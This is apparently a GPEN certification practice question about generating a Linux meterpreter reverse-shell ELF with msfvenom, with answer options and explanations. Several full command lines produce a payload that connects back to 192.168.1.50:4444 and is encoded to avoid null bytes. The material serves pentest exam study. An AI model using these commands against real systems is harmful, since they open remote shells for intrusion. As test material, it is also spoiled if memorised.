GPEN Metasploit Practice Question
A penetration tester uses msfvenom to generate a Linux ELF reverse shell payload. The tester wants the payload to connect back to 192.168.1.50 on port 4444 and to embed an encoder that removes null bytes and other bad characters to survive transmission through a constrained channel. Which msfvenom command line correctly produces this payload?
⚠ Common exam trap
The trap here is focusing on the encoder flag while overlooking that bad-character exclusion requires the -b option and that the output format must match the target platform.
Answer choices
Why each option matters
Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.
Correct answer & explanation
✓
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf
The correct msfvenom invocation selects the Linux reverse TCP payload, supplies the callback host and port, applies the shikata_ga_nai encoder, declares null bytes as bad characters with -b, and outputs an ELF file. The -b option is what drives the encoder to avoid those bytes in the final payload, which is required for the constrained channel. The other options either omit bad-character handling, use the wrong format, or add a contradictory platform flag.
Answer analysis
Option-by-option breakdown
For each option: why learners choose it and why it is or isn't the right answer here.
- ✓
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf
Why this is correct
This command selects the Linux reverse TCP payload, sets the callback host and port, applies the shikata_ga_nai encoder, specifies null bytes as bad characters to avoid, and outputs an ELF file. The -b option tells msfvenom to encode the payload so the listed bytes do not appear, which is exactly the requirement for surviving a constrained channel. All parameters align with the scenario.
- ✗
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -f elf -o shell.elf
Why it's wrong here
This command omits the -b option, so no bad characters are declared and the encoder is applied only for basic obfuscation without a specific exclusion list. Null bytes may still appear in the output, which could break transmission through the constrained channel. It does not meet the requirement to remove null bytes and other bad characters.
- ✗
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf --platform windows
Why it's wrong here
This command includes an unnecessary and contradictory --platform windows option while targeting a Linux ELF payload. The platform flag would cause msfvenom to reject or misbuild the payload because the selected payload is for Linux. The rest of the command is correct, but the platform override invalidates it for the scenario.
- ✗
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f exe -o shell.elf
Why it's wrong here
The payload and encoder are correct, but the output format is set to exe, which produces a Windows executable rather than a Linux ELF binary. A Linux target cannot execute a PE file, so the payload would fail. The format must be elf to match the target platform, making this option incorrect despite the correct bad-character handling.
About these practice questions
This GPEN question is part of Courseiva's 298-question bank — original exam-style content with full explanations and wrong-answer analysis, never real exam questions or exam dumps. Learn why practice questions differ from exam dumps →
JA
Written and reviewed by Johnson Ajibi, MSc IT Security
Senior Network & Security Engineer · founder of Courseiva
Last reviewed September 2026 · checked against the official GIAC exam blueprint
This GPEN practice question is part of Courseiva's free GIAC certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the GPEN exam.